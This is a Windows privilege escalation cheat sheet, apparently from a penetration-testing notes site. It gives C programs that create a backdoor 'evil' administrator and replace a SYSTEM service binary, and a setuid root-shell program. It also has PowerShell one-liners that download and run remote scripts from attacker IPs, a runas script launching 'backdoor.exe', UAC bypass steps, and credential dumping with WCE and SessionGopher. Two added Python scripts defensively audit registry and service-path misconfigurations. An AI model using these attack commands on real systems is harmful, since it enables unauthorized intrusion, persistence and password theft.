# Windows Escalation

{% hint style="info" %}
PowerUp is a good first hit for privesc
{% endhint %}

### **New user:**

Imagine a program that runs a file with SYSTEM privileges and also lets us read and write that file. We can replace the file, relaunch the program, and get our new file executed:\
\>`icacls ServiioService.exe` //see that the file is NTAuth\
Make a C file called **useradd.c**:

```c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

int main(void)
{
    int i;
    /* create the user, then add it to the local administrators group */
    i = system("net user evil Ev!lpass /add");
    i = system("net localgroup administrators evil /add");
    (void)i;
    return 0;
}
```

\
Then convert it to an exe:\
\> `i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c`\
\> `move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"`\
\> `net stop Serviio`\
\>`wmic service where caption="Serviio" get name, caption, state, startmode`\
\>`shutdown /r /t 0`\
\>`net localgroup Administrators` //should see our user "evil"\
\
\
**Batch scripts (.bat):**\
This is a legacy Windows scripting language. It has since been overshadowed by VBScript and PowerShell, but it still works fine and is easy to use. A sample batch script to open cmd:\
`START cmd.exe`

Learn more at

{% embed url="https://www.tutorialspoint.com/batch_script/index.htm" %}

**Unquoted Paths:**\
An unquoted service path containing spaces, such as C:\Program Files\My Program\My Service\service.exe, makes Windows try to run an executable from the following paths in order (any of them except the last could be created and would be run instead of the real binary):\
C:\Program.exe\
C:\Program Files\My.exe\
C:\Program Files\My Program\My.exe\
C:\Program Files\My Program\My Service\service.exe\
\
\
USBPcap:\
\>`driverquery /v` //shows USBPcap as a driver\
\# `searchsploit USBPcap`\
`C:\Program Files\USBPcap> type USBPcap.inf` //checking whether the installed version matches the searchsploit result\
//we then compile it for Windows and run it

## Manual

System info (or sysinfo):

> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

List Processes:

> tasklist /SVC

Network Info:

> ipconfig /all

> route print

> netstat -ano

Firewall:

> netsh advfirewall show currentprofile

> netsh advfirewall firewall show rule name=all

Scheduled tasks:

> schtasks /query /fo LIST /v

Installed apps and patch levels:

> wmic product get name, version, vendor

> wmic qfe get Caption, Description, HotFixID, InstalledOn

Read/write files:

> accesschk.exe -uws "Everyone" "C:\Program Files"

> powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$\_.AccessToString -match "Everyone\sAllow\s\sModify"}

Mounted Disks:

> mountvol

Driver enum:

> powershell driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

> Get-WmiObject Win32\_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$\_.DeviceName -like "*VMware*"}

Fast privesc checks (looking to see whether these are enabled, i.e. set to 1):

> reg query HKEY\_CURRENT\_USER\Software\Policies\Microsoft\Windows\Installer

> reg query HKEY\_LOCAL\_MACHINE\Software\Policies\Microsoft\Windows\Installer
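The two registry queries above are the check for the AlwaysInstallElevated installer policy (the value name the notes leave implicit). The policy is only effective when the value is `0x1` under both HKEY\_CURRENT\_USER and HKEY\_LOCAL\_MACHINE, so a hardening audit needs both results together. The script below is an added example, not part of the original page: it parses captured `reg query` output offline and reports whether the policy is effective; the sample output is constructed, including the error text `reg query` prints for a missing key.

```python
"""Offline check for the AlwaysInstallElevated misconfiguration from captured reg query output."""
import re
from typing import Dict, Tuple

# Constructed `reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer` output.
HKCU_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

# Constructed `reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer` output.
HKLM_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
    DisableMSI    REG_DWORD    0x0
"""

# What reg query prints when the policy key does not exist at all (no value set).
MISSING_KEY_OUTPUT = "ERROR: The system was unable to find the specified registry key or value."

POLICY_VALUE = "AlwaysInstallElevated"


def parse_reg_query(text: str) -> Dict[str, Tuple[str, str]]:
    """Return {value_name: (type, data)}; an error message or empty key yields {}."""
    values: Dict[str, Tuple[str, str]] = {}
    for line in text.splitlines():
        # Value lines are indented; name, type and data are separated by runs of spaces.
        match = re.match(r"^\s+(\S.*?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$", line)
        if match:
            name, reg_type, data = match.groups()
            values[name] = (reg_type, data.strip())
    return values


def dword_is_one(values: Dict[str, Tuple[str, str]], name: str) -> bool:
    """True when the named value is a REG_DWORD whose data (printed as hex, e.g. 0x1) equals 1."""
    reg_type, data = values.get(name, ("", ""))
    if reg_type != "REG_DWORD":
        return False
    try:
        return int(data, 16) == 1
    except ValueError:
        return False


def always_install_elevated(hkcu_text: str, hklm_text: str) -> bool:
    """The policy takes effect only if BOTH hives set AlwaysInstallElevated to 1."""
    return (dword_is_one(parse_reg_query(hkcu_text), POLICY_VALUE)
            and dword_is_one(parse_reg_query(hklm_text), POLICY_VALUE))


if __name__ == "__main__":
    if always_install_elevated(HKCU_OUTPUT, HKLM_OUTPUT):
        print("[!] AlwaysInstallElevated is effective: set both values to 0 or remove the policy")
    else:
        print("[+] AlwaysInstallElevated is not effective")
```

Only a `REG_DWORD` of exactly 1 counts; a missing key, a missing value, or a value of `0x0` in either hive means the policy is not in force, which is also the remediation state a hardening baseline should enforce.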

Check enabled services:

> net start

or

> wmic service where 'Caption like "Remote%" and started=true' get Caption

`reg query HKEY_CURRENT_USER\Software\Administrator\WinSCP`

## more

PowerShell: grab and run a ps1 file:\
PS>`IEX (New-Object Net.WebClient).downloadString('http://10.10.14.20:8888/Sherlock.ps1')`\
\
or remote (might have to URL-encode if you do it from the browser):\
\
`C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://IP:80/ms16032.ps1')"`\
\
//great priv esc sheet\
<https://www.puckiestyle.nl/windows-privilege-escalation/>\
\
**Unquoted service path:**\
If we see a job or command that is run unquoted and has spaces in its path, we can place a file at one of the intermediate paths, and it gets grabbed first.\
ex:\
`c:\Program Files (x86)\Canon\IJ Scan Utility\SETEVENT.exe`\
We can then either do an exploit at Program.exe or IJ.exe\
\
Search for unquoted service paths:\
\>`wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """`\
\
//manual check for an unquoted service path by checking the service itself\
\>`sc qc <service name>`
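The `wmic`/`findstr` pipeline above and the "Unquoted Paths" walk-through earlier in the page are the same audit: find auto-start services whose binary path is unquoted and contains spaces, then work out which intermediate executables Windows would try first. The script below is an added example, not part of the original page or of PowerUp: it parses captured `wmic service get name,displayname,pathname,startmode` output offline (the sample table is constructed) and, for each flagged service, lists every intermediate `.exe` Windows would look for, which generalizes the page's `Program.exe` / `IJ.exe` note to the full search order. The fix for each finding is to quote the service's ImagePath and make sure the intermediate directories are not writable by standard users.

```python
"""Offline audit of Windows service binary paths for the unquoted-path weakness."""
import re
from typing import Dict, List, Tuple

# Constructed sample of `wmic service get name,displayname,pathname,startmode` output.
# wmic pads columns so neighbouring columns are separated by at least two spaces, and it
# prints the requested properties in alphabetical order; the parser keys by header name.
WMIC_OUTPUT = r"""
DisplayName             Name       PathName                                                      StartMode
Serviio                 Serviio    C:\Program Files\Serviio\bin\ServiioService.exe               Auto
Canon IJ Scan Utility   IJScan     c:\Program Files (x86)\Canon\IJ Scan Utility\SETEVENT.exe     Auto
Print Spooler           Spooler    C:\Windows\System32\spoolsv.exe                               Auto
Safe Service            SafeSvc    "C:\Program Files\Safe Vendor\svc.exe" -k netsvcs             Auto
Manual Service          ManualSvc  C:\Program Files\Manual Vendor\manual.exe                     Manual
"""

WINDOWS_DIR = "c:\\windows\\"  # the page's wmic pipeline excludes binaries under C:\Windows\


def parse_wmic_services(text: str) -> List[Dict[str, str]]:
    """Parse wmic's padded table into one dict per service keyed by the header names."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    if not lines:
        return []
    header = re.split(r"\s{2,}", lines[0].strip())
    rows = []
    for line in lines[1:]:
        fields = re.split(r"\s{2,}", line.strip())
        if len(fields) == len(header):  # skip anything that does not line up with the header
            rows.append(dict(zip(header, fields)))
    return rows


def binary_from_pathname(pathname: str) -> Tuple[str, bool]:
    """Return (binary path, was_quoted) for a PathName that may carry arguments."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        return (pathname[1:end] if end != -1 else pathname[1:]), True
    # Unquoted: assume the binary ends at the first ".exe"; anything after it is arguments.
    match = re.search(r"\.exe", pathname, re.IGNORECASE)
    return (pathname[: match.end()] if match else pathname), False


def unquoted_candidates(binary: str) -> List[str]:
    """Executables Windows tries, in order, before the real one: the path cut at each space plus '.exe'."""
    return [binary[:i] + ".exe" for i, ch in enumerate(binary) if ch == " "]


def audit(wmic_text: str, auto_only: bool = True) -> List[Dict[str, object]]:
    """One finding per service whose binary is unquoted, contains spaces and is outside C:\\Windows\\."""
    findings: List[Dict[str, object]] = []
    for svc in parse_wmic_services(wmic_text):
        if auto_only and svc.get("StartMode", "").lower() != "auto":
            continue
        binary, quoted = binary_from_pathname(svc.get("PathName", ""))
        if quoted or " " not in binary or binary.lower().startswith(WINDOWS_DIR):
            continue
        findings.append({"name": svc["Name"], "binary": binary,
                         "candidates": unquoted_candidates(binary)})
    return findings


if __name__ == "__main__":
    for finding in audit(WMIC_OUTPUT):
        print(f"[!] {finding['name']}: {finding['binary']}")
        for candidate in finding["candidates"]:
            print(f"      would be run first if it existed: {candidate}")
```

Note that the Serviio entry is flagged even though its only candidate, `C:\Program.exe`, sits in the drive root: the audit reports the misconfiguration, and a separate ACL check (the page's `accesschk`/`icacls` commands) decides whether any of the listed locations is actually writable.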

## run file as another user

Run file as another user with powershell.\
`echo $username = '<username>' > runas.ps1`\
`echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1`\
`echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1`\
`echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1`

## Service hijack

PowerUp and msf can do this.

If we can write to the service binary directory, we can replace the service binary with our own, as in the Serviio example above.

## Adding Users/Groups

### **Adding a RDP group:**

`#net localgroup "Remote Desktop Users" <username> /add`\
\
**Adding admin group:**\
`#net localgroup "Administrators" <username> /add`\
\
**Groups:**\
TelnetClients\
Remote Desktop Users\
Administrators

## Set User ID

```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setresuid(0, 0, 0);  /* set real, effective and saved uid to root */
    system("/bin/bash"); /* spawn a shell with that identity */
    return 0;
}
```

`# Compile`\
`gcc suid.c -o suid`

## Add user

```c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

int main(void)
{
    int i;
    /* create the user, then add it to the local administrators group */
    i = system("net user <username> <password> /add && net localgroup administrators <username> /add");
    (void)i;
    return 0;
}
```

\# Compile

`i686-w64-mingw32-gcc -o useradd.exe useradd.c`

Add a user: `net user <username> <password> /add`

Add a user to a group: `#net localgroup "Remote Desktop Users" <username> /add`

## UAC Bypass

\
**Going from Admin user to High Integrity Admin** (able to run more commands without UAC stopping us)**:**\
//check current groups\
\>`whoami /groups`\
//escalate then check again\
\>`powershell.exe Start-Process cmd.exe -Verb runAs`\
\
\
**Windows 10 build 1709:**\
\>`C:\Windows\System32\fodhelper.exe`\
\>`cd C:\Tools\privilege_escalation\SysinternalsSuite`\
\>`sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe` //check that autoelevate is set to true\
//if so then look at pages 546-554

## Pass hunting

#### wce:

Windows Credentials Editor (WCE) is a security tool that allows one to perform several attacks to obtain clear text passwords and hashes from a compromised Windows host. Among other things, WCE can steal NTLM credentials from memory and dump cleartext passwords stored by Windows authentication packages installed on the target system such as msv1\_0.dll, kerberos.dll, and digest.dll.

C:\>`wce -w`

#### Session gopher:

A FireEye PowerShell (ps1) tool that searches a system for saved passwords (Telnet, WinSCP, RDP, etc.).

//download tool to kali

`#wget https://raw.githubusercontent.com/fireeye/SessionGopher/master/SessionGopher.ps1`

//set up an HTTP server to transfer the file, then run it on the remote target

`#python -m SimpleHTTPServer 80`

> `powershell.exe -nop -ep bypass -C iex (New-Object Net.Webclient).DownloadString('http://192.168.13.71/SessionGopher.ps1'); Invoke-SessionGopher -Thorough`
